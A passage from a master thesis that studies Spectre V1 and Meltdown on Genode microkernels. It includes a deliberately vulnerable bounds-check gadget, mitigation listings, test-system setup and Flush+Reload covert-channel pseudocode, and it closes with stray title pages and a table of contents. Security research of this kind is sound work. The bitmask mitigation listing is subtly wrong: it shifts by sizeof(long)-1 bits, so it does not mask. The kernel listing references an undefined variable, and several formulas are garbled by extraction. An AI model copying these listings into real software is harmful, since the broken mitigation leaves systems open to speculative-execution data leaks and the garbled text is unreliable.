2.5 Spectre

Spectre is a class of microarchitectural attack leveraging speculative execution on some modern processors [24]. Spectre attacks can be used to read memory from other user processes or the kernel. Kocher et al. [24] described four different attacks; in this thesis, we will focus on the attack exploiting conditional branches Spectre Version 1 (Spectre V1).

(23)

2.5. Spectre

2.5.1 Spectre V1 Attack Description

Spectre V1 exploits speculative execution to bypass conditional branches. To execute Spectre V1, an attacker first needs to find a vulnerable function in another process. One example of a vulnerable function can be seen in Listing 2.5. For this example to work, shared_array needs to point on memory shared by the attacker and the victim. This example function is vulnerable to a SCA which can allow an attacker to read the private_array, but by using Spectre V1, an attacker could also read data outside private_array.

An attacker can by calling the function read_data many times with idx smaller than the size of private_array train the CPU to speculatively evaluate the condition on line 2 to true and furthermore, execute line 3. The speculative execution can be triggered if the variable size_of_private_array is not cached and, therefore, takes hundreds of CPU cycles to fetch. If the CPU after this speculative execution evaluates the condition on line 2 to false, line 3 is never committed. The speculative execution may still have left data in the cache which may be read by the attacker using Flush+Reload or another cache-based SCA.

Listing 2.5: A function which is vulnerbale to Spectre V1. 1 void read_data(unsigned int idx){

2 if (idx < size_of_private_array)

3 dummy = shared_array[private_array[idx]] 4 }

2.5.2 Spectre V1 Mitigations

Spectre V1 relies on speculative execution for its exploit, thus, a straight forward approach for mitigation would be to disable speculative execution. Disabling speculative execution may, however, degrade performance according to Kocher et al. [24]. Another strategy proposed by Kocher et al. is to apply a bitmask to the index, effectively forcing the index to be within the bounds of the array. This method, due to dependant computations, does not allow for the array access to be invalid [19].

2.5.2.1 Preventing Speculative Execution

Intel recommends the use of the lfence instruction to prevent speculative execution as it serializes instructions and has good performance over other serializing instructions [18].Listing 2.6 shows how the lfence instruction can be applied to mitigate Spectre V1 in the vulnerable function.

Listing 2.6: A function which was vulnerable to Spectre V1 after the load fence mitigation has been applied.

1 void victim(size_t idx) { 2 if(idx < array_size) {

3 _mm_lfence(); // Guaranteed to be executed

4 int foo = array[idx]; // after condition is evaluated

5 do_something(foo);

6 }

7 }

Microsoft have added a feature in their MSVC compiler which allows the compiler to add a speculative code execution barrier, similar to lfence. This mitigation should have a negligible impact on performance according to Microsoft7.

7_{Microsoft. “/Qspectre”. In: (Oct. 2018).} _URL_{: https://docs.microsoft.com/en- us/cpp/build/} reference/qspectre?view=vs-2019(visited on 2019-04-16).

(24)

2.5. Spectre

2.5.2.2 Index Bitmasking

Stuart [43] showed a Spectre V1 mitigation which used bit operations to remove the possibility of indexing outside the array. Listing 2.7 shows an example of a function which uses these bit operations to mitigate a Spectre V1 attack. Line 4 in the Listing sets mask to a negative number if size >= idx. The OR operation on line 4 prevents an attack from overflowing the conversion8. After right shifting in line 6 mask will contain only 0s if size < idx or else only 1s. This code is dependent on arithmetic right shift, which is implementation-defined9, and thus depends on the compiler and architecture. Line 8 inverts maskto simplify the operation on line 10, where idx is OR:d with either 0s, if idx >= size or else 1s. Hance, the array cannot be indexed with a value greater or equal to size.

Listing 2.7: A function which was vulnerable to Spectre V1 after the bitmask mitigation has been applied.

1 void victim(unsigned long idx) { 2 // unsigned long size

3 if (idx < size){

4 // Set mask to negative number if size >= idx

5 long mask = idx | (size - 1 - idx);

6 // mask = 0x000.... if mask < 0 else 0xFFF...

7 mask >>= (sizeof(long) - 1); // arithmetic right shift

8 // mask = 0xFFF... if mask = 0x000... else 0x000...

9 mask = ~(mask);

10 // idx & mask = idx if mask = 0xFFF... else 0

11 int foo = array[idx & mask];

12 }

13 }

A mitigation similar to the one described in Listing 2.7 has been implemented in the Linux kernel10, see Listing 2.8. This mitigation uses two instructions to perform the bit masking. The first instruction, "cmp %1,%2", sets the carry flag to 1 if size < idx. The next instruction, "sbb %0,%0;", sets mask either to -1, if the carry flag is set, or 0 otherwise. Consequently, array_index_mask_nospec will return 0x00000000 if idx >= size and 0xFFFFFFFF otherwise. OR:ing idx with the returned value will give either idx if idxis in range and 0 otherwise.

8_{J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018.} _URL_{: https : / / lwn . net /} Articles/744287/(visited on 2019-03-25).

9_{Arithmetic operators.} _URL_{: https://en.cppreference.com/w/c/language/operator_arithmetic} (visited on 2019-03-25).

10_{D. Williams. x86: Implement array_index_mask_nospec. Jan. 2018.} _URL_{: https://git.kernel.org/pub/} scm/linux/kernel/git/tip/tip.git/commit/?id=babdde2698d482b6c0de1eab4f697cf5856c5859 (visited on 2019-03-26).

(25)

2.6. Performance

Listing 2.8: A function which was vulnerable to Spectre V1 after the built-in Linux kernel mitigation has been applied.

1 /* Source from

2 * https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git

3 * commit = babdde2698d482b6c0de1eab4f697cf5856c5859

4 */

5 static inline unsigned long

6 array_index_mask_nospec(unsigned long idx, unsigned long size) {

7 unsigned long mask;

8 asm ("cmp %1,%2;" "sbb %0,%0;"

9 :"=r" (mask) :"r"(size),"r" (index) 10 :"cc");

11 return mask;

12 } 13

14 void victim(unsigned long idx) { 15 // unsigned long size

16 if (idx < size){

17 idx &= array_index_mask_nospec(idx, size); 18 int foo = array[idx];

19 }

20 }

2.6 Performance

In order to evaluate the performance impact of mitigations against Spectre on RPC, there is a need for a basic understanding of IPC performance and microkernel performance. In addition, we present criticism against microkernel performance and performance of monolithic designs.

2.6.1 Microkernel Performance

Lameter [26] has looked at the performance of a monolithic Linux kernel compared to an abstract microkernel and discusses the microkernels inability to scale with increasing counts of processes.

2.6.2 IPC Performance

Immich et al. [17] performed the analysis by measuring the time it took for two processes to exchange messages over the different IPC mechanisms, to get the current time the function gettimeofday was used since it provides microsecond accuracy. A similar study has been done for Sel4:s current IPC [49], which examined overhead of allocating different IPC mechanisms as well as execution time for using them.

2.7 Related Work

Genode is not the only issue of process separation and resource limitation, for a good understanding of the benefits and disadvantages of microkernels, the alternative solutions need to be understood. Besides, there is a body of work relating to Genode and security which is not relevant to microarchitectural attacks specifically but which do motivate an interest to investigate them.

(26)

2.7. Related Work

2.7.1 Genode

Genode has seen work related to security, Constable et al. [5] worked on extending formal Sel4 verification to Virtual Machine Monitor (VMM) running on Genode. Lange et al. [28] used Genode and a microkernel to form a secure encapsulation of smartphone OSs. Waddington et al. [46] implemented a high performance web-cache using Genode+Fiasco.OC. Hamad and Prevelakis [13] measured IPsec performance on Genode running on Rasperry PIs.

Several other works have focused on using Genode as a means to achieve a secure OS. Brito et al. [1] used Genode as a secure kernel base to process images securely on an ARM TrustZone cloud environment. Ribeiro et al. [38] used Genode to construct a Trustzone-backed database management system. Ramos [37] proposed the development of a toolkit, using Genode as a base, easing development of Trustzone projects. Harp et al. [14] recommends a reference architecture ISOSCELES for medical devices building on Genode, using either Nova or Sel4 as a microkernel base. Hamad et al. [12] used Genode to implement a secure intra-vehicle communication framework, utilizing its IPC mechanisms for efficient message passing.

Genode has seen little work related to microarchitectural attacks and side channels. Schmidt et al. [39] constructed a covert channel in Genode which exploited a software cache to construct a timing channel. However, to the best knowledge of the authors, there has been no other work relating to SCAs in Genode.

2.7.2 Side Channels

Xiao et al. [47] demonstrate a covert channel using execution time for write accesses to shared memory pages. They leverage the Copy-On-Write (COW) technique, which is commonly used for shared memory implementations. COW copies the requested page and writes to the copy on demand, thus revealing if a page is shared or not by measuring the time of executing a write [47]. Xiao et al. [47] also demonstrate, using this technique, examples of a covert channel transmitting 50-90 bps for practical applications.

Pessl et al. [35] present a covert cross CPU channel utilizing varying access times of memory banks in DRAM. They demonstrated a channel with a capacity of 2.1 Mbps with an error probability of 1.8% and across VM channel with a capacity of 596 kbps with an error probability of 0.4%

2.7.3 Microarchitectural Attacks

Mcilroy et al. [33] examined the deep seated implications of how Spectre and incorrect hardware models affect confidentiality-enforcing programming languages. Mcilroy et al. showed that that these confidentiality guarantees are completely compromised by Spectre. Koruyeh et al. [25] showed that the Return Stack Buffer (RSB) could be exploited instead of the BPU, thus introducing a class of SpectreRSB attacks. Koruyeh et al. were not successful in demonstrating these attacks on ARM and AMD CPUs. However, ARM and AMD CPUs also utilize an RSB and should therefore be vulnerable.

There has also been work examining SCAs targeting ARM Trustzone. Lapid and Wool [29] mounted a side-channel cache attack against the ARM32 AES implementation used by the Keymaster trustlet. Another work by Bukasa et al. [3] showed the ineffectiveness of Trustzone to prevent power analysis SCAs.

Microarchitectural attacks are also a quickly progressing field. A recent work by Schwarz et al. demonstrated the ZombieLoad attack, a new type of microarchitectural attack which exploits a fill buffer to read data from other processes [40]. This fill buffer is a type of load

(27)

2.7. Related Work

2.7.4 Linux Control Groups

The Linux kernel implements limitation of resources in the form of control groups (cgroups). According to the man-page for cgroups:

"A cgroup is a collection of processes that are bound to a set of limits or parameters defined via the cgroup filesystem." [4]

Cgroups can restrict the use of resources like CPU and memory for processes in a cgroup. Cgroups may also provide guarantees of CPU time for processes in a group. However, unlike Genode, cgroups do not allow non-root processes in a cgroup to have children of their own [4].

2.7.5 Security by Virtualization

Using a small kernel is not the only way to potentially enhance the security of a system. Another feasible option is to use different virtual systems to separate processes. The virtual systems need to be running on a hypervisor, which may be attacked. Thongthua and Ngamsuriyaroj [44] discusses some weaknesses they found in popular hypervisor software. However, the abstraction of virtualization does not prevent microarchitectural attacks such as Meltdown or Spectre [31, 24]. Irazoqui et al. [21] recovered an AES key in a cross-virtual machine setup using a SCA that abused the LLC. The attack is not dependent on the virtual machine running on the same core since the LLC cache was used. Virtualization also adds to overhead by handling multiple OSs running on the hardware.

(28)

3 Method

This chapter first begins by presenting how the tested system was set up, including how output was obtained, how the kernels were set up with Genode and how they were booted. Secondly, presents the design and measurement method used for the covert Flush+Reload channel. Thirdly, the design of the Meltdown attack and Spectre V1 attack is presented. Lastly, the methodology for measuring the performance impacts of Spectre V1 mitigations is presented.

3.1 Setting up System Under Test

The System Under Test (SUT) is composed of Genode with a microkernel core, an attack implementation and an output channel. This setup was executed on an Intel Core i5-7500 CPU.

We used Genode’s build tools and documentation to build our implementation for each kernel1. These build tools were available at Genode’s Github page2. To run a build, Genode requires an init-component which is assigned all system resources. Genode then delegates the task of assigning resources to this init-component. We build our implementation by assigning an initial resource budget to our process, thus enabling it to execute, use RPC and allocate memory. Figure 3.1 shows how the init process may start and delegate resources to two user processes. Genode’s build tools will from our configuration create files which are used to boot the kernel with our implementation. These files can be used by Grub2 to multi-boot the tested SUT.

3.1.1 Using x86 Intrinsics

The content from the file:

/genode-gcc/lib/gcc/x86_64-pc-elf/6.3.0/include/mm_malloc.h,

was removed due to a compiler error. This was needed to allow for the use of the library file <x86intrin.h>, which supports instructions for the rdtsc and lfence instructions.

(29)

3.1. Setting up System Under Test

Microkernel Genode

Init

User proc. 1 RPC User proc. 2

Figure 3.1: Overview of Genode’s Hierarchy

3.1.2 Obtaining Output

Serial communication was used between the system under test and another computer to obtain output from the attacking application, see Figure 3.2. This was done to obtain output, as Genode does not include a graphical user interface per default. Instead, the default behavior of Genode is to forward all log events to the serial port.

To configure the serial port a modification of Bender was needed. Bender is a small kernel which is used to boot the host kernel. Per default, on boot, Bender finds a serial port and saves the address of this port to a specific memory address [7]. After that, Bender boots the microkernel and Genode. Genode can now look at that address to know which serial port to forward all logs to.

Serial communication Output to monitor

Measuring System Test System

Figure 3.2: The communication setup to retrieve output from the tested system.

Bender did not choose the correct serial port on the tested PC and was therefore modified to select a serial port in use. The used Bender version can be found at Alexander Boettcher’s Github page3.

We changed the <bender.c> file4 so that com0_port was chosen to 0x3f8. Where 0x3f8is the address to the serial port on the test PC, as shown by running the command dmesgin Linux. The change made to Bender can be seen in Listing 3.1 and 3.2.

3_{https://github.com/alex-ab/morbo/tree/e4744198ed481886c48e3dee12c1fbd47411770f} 4_{https://github.com/alex-ab/morbo/blob/cb5ec9453af8e7f5d63289aa1884106ce95b4a36/} standalone/bender.c

(30)

Listing 3.1: Genode’s Default Bender

if (!serial_ctrl.cfg_address && !iobase && serial_ports(get_bios_data_area()) && serial_fallback) { *com0_port = 0x3f8;

*equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9); }

Listing 3.2: Genode’s Bender After Applied Changes

/* if (!serial_ctrl.cfg_address && !iobase && serial_ports(get_bios_data_area()) && serial_fallback) { */ *com0_port = 0x3f8;

*equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);

//}

3.1.3 Building and Running on Nova

Genode’s build tool created the files hypervisor and image.elf.gz when an application was compiled for Genode+Nova. These files were located at:

<genode_build_dir>/var/run/spectre/boot,

if an application named "spectre" was compiled. These files can be used in Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Nova by adding the menu entry shown in Listing 3.3, where <boot> is the folder containing hypervisor and image.elf.gz.

Listing 3.3: Grub2 Menu Entry for Nova

1 menuentry ’Genode Spectre Nova’ {

2 insmod multiboot2

3 insmod gzip

4 multiboot2 <...>/bender # Path to modified bender binary.

5 module2 <boot>/hypervisor hypervisor iommu nopid novga serial

6 module2 <boot>/image.elf.gz image.elf

7 }

3.1.4 Building and Running on Okl4

Genode’s build tool created the file image.elf when an application was compiled for Genode+Okl4. This file was located at:

<genode_build_dir>/var/run/spectre/boot,

when and application name "spectre" was compiled. This file can be used with Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Okl4 by adding the menu entry shown in Listing 3.4, where <boot> is the folder containing image.elf.

(31)

Listing 3.4: Grub2 Menu Entry for Okl4

1 menuentry ’Genode Spectre Okl4’ {

2 insmod multiboot2

3 multiboot2 <...>/bender # Path to modified bender binary.

4 module2 <boot>/image.elf

5 }

Our application did not build on Okl4 by using the default build file. We added march= nativeto compile programs containing assembly instructions. The march=native flag tells the compiler to tailor the assembly instruction set for the used CPU5_.

3.1.5 Building and Running on Linux

The output from the Genode application was forwarded from the terminal to the serial port. This was done to use the same measurement methodology as for the two other kernels.

3.1.6 Measuring Throughput

To measure the channel’s or the attacks’ throughput, a fixed string message m of length n was transmitted. Throughput T was then calculated as the number of correctly transmitted bytes per second (Bps) of transmission. This definition of throughput has been used to measure other microarchitectural attacks [31, 25]. A byte in position i was considered correctly transmitted if the received byte rihad the same value as the message byte mi. The throughput, T, was calculated as:

T= °_n i=0C(mi, ri) tn (3.1) , where C(m, r) = # 1 if r=m 0 otherwise , and

tn =Total execution time in seconds T=Throughput of the channel

C(m, r) =Function to determine equality of bytes

. An array of size 2048 bytes was used to measure throughput. Every leaked byte was forwarded via serial communication to the measuring system, see Figure 3.2. Each sent byte was then compared to the correct byte, see Equation (3.1).

Genode’s timer object was used in Nova and Linux to measure the total execution time, tn, with millisecond accuracy. Some changes need to be made to the Genode-application run file, where timer needs to be added to build and build_boot_image. The timer object was not used on Okl4; instead, a timer at the measuring system was used to measure tn. On Okl4, a start-timer command was transmitted via the serial port before the first transmission byte and an end-timer command after the last byte. The timer on the measuring system was started and stopped by these commands. The execution time, tn was transmitted after transmitting all bytes if Genode’s timer object was used.

5_{Using the GNU Compiler Collection (GCC): x86 Options.} _URL_{: https://gcc.gnu.org/onlinedocs/gcc/} x86-Options.html(visited on 2019-03-25).

(32)

3.2. Implementing the Flush+Reload Channel

3.2 Implementing the Flush+Reload Channel

To answer Research Question 1, we will first demonstrate that Flush+Reload can be used to create a covert channel between two processes in Genode. To verify the result, we construct two conspiring processes which utilizes Flush+Reload in order to communicate a message.

Shared memory, allocated to a size of (256 + 2) * Padding, was used for the Flush+Reload channel. There were 256 addresses to distinguish addresses as different values. These addresses were offset using a padding to prevent prefetching between values. Padding was also used at the beginning and at the end of the array to prevent prefetching of shared memory addresses from accesses outside of the array.

In Figure 3.3, this design is used to transmit the values by caching the corresponding address. The receiver, pictured in the figure, can then measure access times to each address in the array and conclude which corresponding value was transmitted.

Padding Padding

0 1 254 is the answer! 254 255

Receiver

Miss Hit!

Figure 3.3: A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array.

3.2.1 Measuring Cache Hits

A threshold was used to decide whether a value was cached or not cached. This threshold was determined by profiling the time it took for the CPU to access cached and uncached values [48]. The L1 cache or LLC was used depending on the attack design. Therefore, two thresholds were defined. One threshold above the L1 cache and one above the LLC.

We assume a memory model of access times as shown in Figure 3.4. In this figure, tLLC is the upper bound for the LLC and tL1 is the upper bound to access the L1 cache. The thresholds tLLCand tL1are chosen as the upper bound of the measurements for the LLC and L1 cache respectively. This choice was made arbitrarily, with the intent of minimizing false positives while preserving true positives.

The time to access a value was measured using the timing function described in Section 2.2.2. To profile uncached accesses, an array of size 4096(256+2)was used. An internal padding of 4096 bytes was used to prevent prefetching.

The time of accessing uncached values was measured by first removing the array from the cache, using clflush. Then measuring the time for accessing each address. A similar method was used to measure the timings for the L1 cache, the difference being that the values were cached in the same process before timing the access.

(33)

3.2. Implementing the Flush+Reload Channel DRAM LLC tLLC L1 tL1 Access T ime Ñ

Figure 3.4: A model of memory access times for different memory levels.

: Measuring Process : Caching Process

RPC_shared_memory() Shared_memory_cap

Lock

Cache current index

Unlock Flush current value

Tell caching process to start

Wait for unlock

Measure fetch time Loop

Figure 3.5: A sequence diagram for measurements of the LLC access times.

processes get scheduled on the same core, the values may be cached in either the L1 cache or the LLC.

3.2.2 Preventing Data Prefetching

The in-order loop in Listing 3.5 triggers the CPU to prefetch addresses before they are accessed, resulting in cache hits. This will result in false-positive cache hits for subsequent values. The example in Listing 3.6 on the other hand flushes all possible values and then measures the access time out of order to prevent data prefetching.

Listing 3.5: Flush+Reload 1 for i in 0...256

2 clflush(address + i*Padding) // Flush channel from cache

3 wait_for_read() // Wait for reloading process

4 for i in 0...256

(34)

Listing 3.6: Flush+Mix 1 for i in 0..255

2 clflush(address + i*Padding) // Flush channel from cache

3 wait_for_read() // Wait for reloading process

4 for i in 0..255 //

5 m = (i * a + b) % 256 // a and 256 relatively prime

6 t = time(leak + m*Padding) // Test value for cache hit

7 if t < LLC_THRESHOLD

8 cache_hits += 1

The offset Padding is used as internal padding to prevent prefetching between values, 4 kB was chosen as the biggest internal padding, as it is the size of pages on the tested system and that the CPU does not prefetch across page boundaries [24, 10]. An example of the array used for the channel can be seen in Figure 3.6, where 4kB internal padding is used.

Padding Padding 0 kB 4 kB 0 8 kB 1 1020 kB 254 1024kB 255 1028 kB

Figure 3.6: Leak Array Layout

SRGs are tested for the best performance of preventing prefetching, measured as no detected cache hits when looping over the array. The SRGs are chosen as m = 256 where a and b in Listing 3.6 are chosen according to the scheme in Section 2.3.2. The SRGs are evaluated by iterating over an array 256 times using indices generated from the SRG. Each access time is measured and checked for a cache hit, as described in Section 3.2.1. The SRGs were further evaluated for the padding sizes 4096, 2048, 1024, 512, 256 and 128. The limits 4096 and 128 were used as they are the page size and cache line size on the tested system. Consequently, the CPU does not prefetch for padding sizes over 4096 bytes and padding below 128 bytes does not guarantee separation between values.

All SRGs where a P[1, 255]and b= 0 were evaluated. The offset b= 0 was chosen as a constant offset should not affect prefetching and to limit the number of SRGs to evaluate. Two SRGs are presented, the one with the best performance in Equation (3.2) and an arbitrarily chosen worse SRG in Equation (3.3). The second is used to illustrate the characteristics of a poor performance SRG.

mi =49i+0 mod 256 (3.2)

mi =33i+0 mod 256 (3.3)

3.2.3 Adapting the Channel to Targeted Kernels

Implementation of Flush+Reload required some adaptations depending on the intended target. One adaptation which had to be made is that the rdtsc instruction was used instead

(35)

timer suggested by Paoloni [34] was used for Linux and Okl4, see Listing 2.2. The alternative timer suggested by Paoloni was used for Nova, see Listing 2.3.

3.2.4 Measuring Throughput of the Covert Channel

The throughput for the covert Flush+Reload channel was measured for use between two processes, see Figure 3.7, and for use inside a single process. The throughput was measured as described in Section 3.1.6.

: Receiver : Transmitter

RPC_shared_memory() Shared_memory_cap

Lock

Cache current data

Unlock Flush all 256 values

Tell caching process to start

Wait for unlock

Measure fetch time for index 0..255 Log index corresponding to first LLC hit Loop

Figure 3.7: A sequence diagram of Flush+Reload communication between two processes.

The throughput for communicating internally with Flush+Reload was measured by using a process which first cleared the leak array from the cache, then cached the current value and used lfence to wait for transmitted byte to be cached. The process then continued iterating over all values in the leak array to check for an L1 cache hit. The throughput could after that be measured by using the method described in Section 3.1.6.

3.2.5 Reducing Noise

To obtain a reliable Flush+Reload channel it may be necessary to make multiple measurements, as done by others [31, 25]. R measurements, mij, were taken for a value i with the purpose of increasing the accuracy. A cache hit detection function fcwas used with a threshold of tcto build a histogram H of recorded cache hits where each entry hiis the count of detected cache hits for value i. The estimation ˆv of the transmitted value v was calculated as: ˆv= max iPt0..255uhi where, hi= R ¸ j=0 fc(mij) and, fc(x) = # 1 if x tc 0 otherwise

In addition, synchronizing was needed to increase the probability of a successful transmission. Locking was used in order to synchronize the transmitter with the receiver.

Examining the Impact of Microarchitectural Attacks on Microkernels : a study of Meltdown and Spectre

Linköping University | Department of Computer and Information Science

Master thesis, 30 ECTS | Datateknik

2019 | LIU-IDA/LITH-EX-A--19/045--SE

Examining the Impact of

architectural Attacks on

Micro-kernels

a study of Meltdown and Spectre

Gunnar Grimsdal

Patrik Lundgren

Upphovsrätt

Copyright

Acknowledgments

Contents

List of Figures

List of Tables

1

Introduction

1.1

Microkernel

1.2

Genode

1.3

Meltdown and Spectre

1.4

Motivation

1.5

Aim

1.6

Research Questions

1.7

Delimitations

1.8

Thesis Outline

2

Background

2.1

CPU Optimizations

2.1.1

Cache

2.1.2

Data Prefetching

2.1.3

Out-of-Order Execution

2.1.4

Speculative Execution

2.1.5

Intel TSX

2.2

Timing Channels

2.2.1

Cache-Based Timing Channels

2.2.2

Accurately Measuring Time

2.3

Flush+Reload

2.3.1

Shared Memory

2.3.2

Preventing Data Prefetching

2.4

Meltdown

2.4.1

Virtual Address Space

2.4.2

Meltdown Attack Description

2.4.3

Proof-Of-Concept Implementation

2.4.4

Mitigations

2.4.5

Meltdown on Genode

2.5

Spectre

2.5.1

Spectre V1 Attack Description

2.5.2

Spectre V1 Mitigations

2.6

Performance